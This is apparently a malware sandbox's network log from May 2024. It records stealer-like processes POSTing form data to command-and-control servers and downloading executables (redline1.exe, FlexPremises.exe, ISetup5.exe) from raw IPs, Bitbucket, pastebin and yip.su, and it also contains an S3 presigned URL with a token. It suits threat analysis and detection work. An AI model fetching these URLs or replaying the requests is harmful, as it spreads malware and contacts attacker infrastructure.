                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:52 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 2408
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKK
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 265
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:52 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFC
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:53 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 270
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:53 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/file300un.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.78:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /files/file300un.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.78
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:51 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:18:01 GMT
                                                                                                                                                                                                                                                                  ETag: "1e94309-618342fe7897a"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 32064265
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                • flag-au
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://bitbucket.org/qwizzi/tt522222/downloads/FlexPremises.exe
                                                                                                                                                                                                                                                                  redline1.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.192.141.1:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /qwizzi/tt522222/downloads/FlexPremises.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: bitbucket.org
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  server: envoy
                                                                                                                                                                                                                                                                  x-usage-quota-remaining: 998918.457
                                                                                                                                                                                                                                                                  vary: Accept-Language, Origin
                                                                                                                                                                                                                                                                  x-usage-request-cost: 1099.40
                                                                                                                                                                                                                                                                  cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  x-b3-traceid: 6072ab2e76c728e4
                                                                                                                                                                                                                                                                  x-usage-output-ops: 0
                                                                                                                                                                                                                                                                  x-used-mesh: False
                                                                                                                                                                                                                                                                  x-dc-location: Micros-3
                                                                                                                                                                                                                                                                  content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:57 GMT
                                                                                                                                                                                                                                                                  x-usage-user-time: 0.028766
                                                                                                                                                                                                                                                                  x-usage-system-time: 0.004216
                                                                                                                                                                                                                                                                  location: https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202
                                                                                                                                                                                                                                                                  expires: Sat, 11 May 2024 22:38:57 GMT
                                                                                                                                                                                                                                                                  x-served-by: 17b182b5521a
                                                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 73
                                                                                                                                                                                                                                                                  content-language: en
                                                                                                                                                                                                                                                                  x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                                  x-b3-spanid: 6072ab2e76c728e4
                                                                                                                                                                                                                                                                  x-static-version: 8363323b7c2c
                                                                                                                                                                                                                                                                  x-render-time: 0.05246257781982422
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  x-usage-input-ops: 0
                                                                                                                                                                                                                                                                  x-version: 8363323b7c2c
                                                                                                                                                                                                                                                                  x-request-count: 652
                                                                                                                                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202
                                                                                                                                                                                                                                                                  redline1.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  52.216.137.116:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  x-amz-id-2: BlUtqSJjBh572r0294k8MutvOTjL2gRswK4nmV1zatkUNEJ59K+MopKdjkZXt4p0JpsdF0Y/ktQ=
                                                                                                                                                                                                                                                                  x-amz-request-id: P1CQGYGXCWW8WB88
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:58 GMT
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 09:20:16 GMT
                                                                                                                                                                                                                                                                  ETag: "bdaf0c44377ebc825e98d8e649ca8f4b"
                                                                                                                                                                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                  x-amz-version-id: wDzb9reThG8HyTtaCPuHdJc.5vrsRSET
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="FlexPremises.exe"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                                                                                                                  Content-Length: 841962
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET / HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 279
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:31 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIE
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-fi
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  65.109.242.112:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST / HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                  Host: 65.109.242.112
                                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:33 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://pastebin.com/raw/E0rY26ni
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.20.3.235:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /raw/E0rY26ni HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pastebin.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  x-frame-options: DENY
                                                                                                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                                                                                                  x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                                  cache-control: public, max-age=1801
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Age: 789
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 22:26:46 GMT
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf14ec906bd-LHR
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://yip.su/RNWPd.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  172.67.169.89:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /RNWPd.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: yip.su
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  memory: 0.36199188232421875
                                                                                                                                                                                                                                                                  expires: Sat, 11 May 2024 22:39:55 +0000
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                  content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                  CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:07:13 GMT
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1oV8x0EkW3Ed3MP%2FME6x9tCC3WidELuDvnzIGyu2E5Wyz9DLIEaTcw%2BA6KakUY7iGdIN2zk0YZgi5mTAM%2BZYD%2BQAPPlNCw2E4be5%2BvDto75yWJUZ6o0nE%2Bs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf14ecedcf7-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.59/ISetup5.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.59:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /ISetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.59
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 22:30:01 GMT
                                                                                                                                                                                                                                                                  ETag: "60a01-6183531693d63"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 395777
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
